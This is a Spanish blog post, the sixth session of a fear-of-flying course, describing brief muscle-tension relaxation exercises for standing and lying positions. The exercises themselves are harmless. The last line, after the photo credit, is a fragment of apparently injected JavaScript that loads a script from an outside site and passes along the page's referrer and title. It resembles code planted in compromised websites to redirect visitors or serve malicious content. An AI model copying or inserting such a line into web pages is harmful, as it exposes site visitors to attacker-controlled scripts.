Sexta Sesión. Relajación Breve II

24/04/2019

Continuamos con la Relajación Breve, en esta ocasión explicaremos cómo utilizarla en posición de pie y acostado. Ésta primera será muy útil en aquellas ocasiones en las que estemos por ejemplo en la cola de facturación, en la cola de embarque, esperando para entrar en el avión, etc.

Muchas veces el simple hecho de no estar ya sentados en el avión produce más ansiedad por lo que si somos capaces de controlar esa ansiedad previa al vuelo llegaremos al asiento mucho más relajados y con más seguridad para controlar la situación. La relajación breve en posición acostado es más adecuada para practicarla en casa, nos sirve para practicar y para utilizarla para relajarnos antes de dormir.

Ejercicios de Relajación Breve en Posición de Pie

Debemos apoyaros en los talones elevando ligeramente las puntas de los pies, cerrar los puños y apretar los antebrazos contra los lados del cuerpo. Cerrar los ojos. En esa posición:

Coger mucho aire por la nariz (respiración natural completa).

Tensar puños, brazos, cara, estómago, piernas y pies.

Mantener la tensión 15 segundos.

Soltar el aire despacio pasando a posición descanso (un pie adelantado) relajando todos los músculos.

Ejercicios de Relajación Breve en Posición Tumbado

Para llevarla a cabo recostarse en posición decúbito supino (acostado sobre su espalda, con los brazos estirados colocados a lo largo de su cuerpo y las piernas extendidas y paralelas, alineadas con la columna vertebral y la espalda, y los pies formando un ángulo recto respecto al resto del cuerpo). Cerrar los ojos. En esta posición:

Coger mucho aire por la nariz (respiración natural completa)

Tensar manos, brazos, cara, estómago, piernas y pies (doblando hacia atrás, tensando los gemelos).

Mantener la tensión 15 segundos.

Soltar el aire despacio pasando a posición de descanso y distender todos los músculos.

Foto | twicepix

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;